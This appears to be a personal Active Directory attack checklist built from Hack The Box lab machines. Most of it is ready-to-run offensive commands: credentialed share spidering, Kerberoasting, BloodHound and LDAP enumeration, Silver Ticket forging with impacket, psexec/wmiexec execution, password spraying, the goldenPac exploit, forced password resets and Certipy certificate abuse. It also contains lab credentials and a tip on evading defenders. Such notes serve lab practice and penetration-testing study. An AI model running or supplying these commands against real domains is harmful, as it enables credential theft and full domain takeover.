Active Directory Checklist
Checklist for my sanity
Unauthenticated
Authenticated
Tip: If authenticated, vpn could be switched to VM Win host to make life easier for certain attacks.
Authenticated
Shares/Policy
nxc smb hathor -u users -p passwords -k -d windcorp.htb -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=finds
smbmap -d <domain> -u melanie -p 'Welcome123!' -H resolute -r --depth 20
smbmap -d cascade.local -u 'r.thompson' -p rY4n5eva -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'
Check files closely with exiftool and strings
Use dnspy to decompile fishy exec files
sniff traffic of exec files
Kerberoast
(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting hashes/kerbroast
impacket-GetUserSPNs -request -dc-ip 10.129.249.79 -target-domain active.htb active.htb/svc_tgs
Bloodhound / ldapsearch / AD Users
bloodhound-python -u 'ldap' -c all -d support.htb -ns 10.129.239.21 -p 'pass' --dns-tcp
Set Objects as owned as you go
Look for GenericAll Privileges given direct or thorough groups. Use the Outbound object control to view these privileges.
Sharphound.exe -c all -d active.htb --domaincontroller 10.10.10.100
Tip: Run this from a runas netonly after grabbing a ticket with dir whackwhack dcipnxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All
Tip: Make sure ~/.nxc/nxc.conf is configured. THIS DOESNT WORK FOR MEldapdomaindump -u 'support.htb\ldap' -p $(cat ../passwords) --no-json --no-grep -r dc
ldapsearch -H ldap://support.htb -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'pass' -s sub '(objectclass=user)' 'info' 'description'
Tip: Use 'star' and look at ALL fields for users. Info and Description especiallyldapsearch -H ldap://dc1 -b 'dc=scrm,dc=local' -U 'ksimpson' -W -s sub '(objectclass=user)' 'memberof'
Analyze full domain dump for anomalies
cat domain.ldif|awk '{print $1}'|sort | uniq -c | sort -nr
Dump AD Users (DC)
nxc ldap dc -u ldap -p passwords --users
Silver Ticket
Need NTLM hash of password
python3 -c "import hashlib;r=hashlib.new('md4','REGGIE1234ronnie'.encode('utf-16le')).digest().hex();print(r)"
Need domain SID
nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
Get-ADDomain
impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
[ ]
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local administrator
Tip: invalid spn throws ioc to blues. Try hardexport KRB5CCNAME=<TGS_ccache_file>
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-mssqlclient <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Password Spray Tip: New passwords found are worth a spray
~/Documents/loadables/tools/kerbrute passwordspray -d search.htb --dc research -t 500 users '@3ONEmillionbaby'
nxc ldap research -u users -p '@3ONEmillionbaby' --continue-on-success
Golden Ticket Forgery CVE-2014-6324
impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis
Can you change passwords?
rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'
Is this a Certificate Authority with vulnerable cert? https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3
Tip: https://github.com/ly4k/Certipy
Last updated